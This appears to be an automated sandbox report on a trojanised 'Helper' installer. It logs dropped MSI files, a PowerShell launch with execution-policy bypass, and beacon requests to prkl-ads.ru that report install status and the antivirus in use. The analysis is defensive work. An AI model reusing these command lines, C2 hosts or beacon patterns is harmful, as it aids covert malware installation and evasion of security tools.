powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: https://www.advancedinstaller.com
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: powershell.exe, 00000005.00000002.528616904.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A52D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000699B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.00000000068D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.550362681.000000000A556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006A35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.0000000006866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.528616904.000000000683D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI76B1.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: https://www.thawte.com/cps0/
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drString found in binary or memory: https://www.thawte.com/repository0W
                  Source: unknownDNS traffic detected: queries for: prkl-ads.ru
                  Source: global trafficHTTP traffic detected: GET /?status=reg&key=llks74638sj&site=Test HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /?status=start&av=Windows%20Defender HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
                  Source: global trafficHTTP traffic detected: GET /?status=install HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000000.387537837.0000000000E08000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: FlashWindowFlashWindowExGetPackagePathhttp://www.yahoo.comhttp://www.example.comhttp://www.google.comTESTtin9999.tmpattachment=.partGETcharsetDLD "filenameutf-8utf-16123POSTAdvancedInstallerLocal Network ServerISO-8859-1US-ASCIIHTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeString found in binary or memory: UFlashWindowFlashWindowExGetPackagePathhttp://www.yahoo.comhttp://www.example.comhttp://www.google.comTESTtin9999.tmpattachment=.partGETcharsetDLD "filenameutf-8utf-16123POSTAdvancedInstallerLocal Network ServerISO-8859-1US-ASCIIHTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)
                  Source: unknownHTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49724 version: TLS 1.2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CE67F00_2_00CE67F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CF27F00_2_00CF27F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D0AC300_2_00D0AC30
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CF3E100_2_00CF3E10
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D900400_2_00D90040
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BDE2300_2_00BDE230
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D9839A0_2_00D9839A
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BDC3630_2_00BDC363
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BE84B00_2_00BE84B0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CAC4500_2_00CAC450
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BB47720_2_00BB4772
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D668400_2_00D66840
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CD29A00_2_00CD29A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00CDEAF00_2_00CDEAF0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D88A2C0_2_00D88A2C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD4B300_2_00BD4B30
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BB2EA00_2_00BB2EA0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D9AEF10_2_00D9AEF1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD8E200_2_00BD8E20
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D9CE190_2_00D9CE19
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD11B00_2_00BD11B0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00DA328A0_2_00DA328A
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BE73A00_2_00BE73A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BCF4200_2_00BCF420
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00C275000_2_00C27500
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD96500_2_00BD9650
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BEB7200_2_00BEB720
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BB74800_2_00BB7480
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BDF9F00_2_00BDF9F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D679000_2_00D67900
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD00405_2_00BD0040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDC5075_2_00BDC507
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDBB085_2_00BDBB08
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDAC305_2_00BDAC30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD00395_2_00BD0039
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD00345_2_00BD0034
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDC0075_2_00BDC007
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD00065_2_00BD0006
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD63D85_2_00BD63D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BD63C85_2_00BD63C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDBAF85_2_00BDBAF8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDBB015_2_00BDBB01
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDAC2D5_2_00BDAC2D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDAC285_2_00BDAC28
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDAC215_2_00BDAC21
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00BDC5B85_2_00BDC5B8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeSection loaded: lpk.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI7331.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\446fc6.msiJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00BBA140 appears 42 times
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00BBA6D0 appears 43 times
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00BB8190 appears 53 times
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: String function: 00BB9610 appears 121 times
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00C8A630 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,0_2_00C8A630
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00D11D40 NtdllDefWindowProc_W,0_2_00D11D40
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00C240A0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00C240A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BC8280 NtdllDefWindowProc_W,0_2_00BC8280
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD8270 NtdllDefWindowProc_W,0_2_00BD8270
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BC8840 NtdllDefWindowProc_W,0_2_00BC8840
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BD2C90 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,0_2_00BD2C90
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BCEE70 NtdllDefWindowProc_W,0_2_00BCEE70
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BC4E60 GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,0_2_00BC4E60
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BCEFE0 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00BCEFE0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00C6EF50 NtdllDefWindowProc_W,0_2_00C6EF50
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BC5580 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,NtdllDefWindowProc_W,SysFreeString,0_2_00BC5580
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameHelper.exe. vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFileNameHelper.exe. vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenamelzmaextractor.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenameAICustAct.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenamePrereq.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Roaming\Helper Company LLCJump to behavior
                  Source: shi69FA.tmp.0.drBinary string: oNrtCloneOpenPacket\Device\NameResTrk\Record3VtI
                  Source: classification engineClassification label: mal52.troj.spyw.evad.winEXE@11/38@2/2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00BBA000 LoadResource,LockResource,SizeofResource,0_2_00BBA000
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeReversingLabs: Detection: 13%
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeVirustotal: Detection: 11%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3407EF71A9E7EFAA675EDBEA938667C8 C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692671532 "
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AADEFB259C244F0AA7BE078D54CFCDDA
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692671532 " Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3407EF71A9E7EFAA675EDBEA938667C8 CJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AADEFB259C244F0AA7BE078D54CFCDDAJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
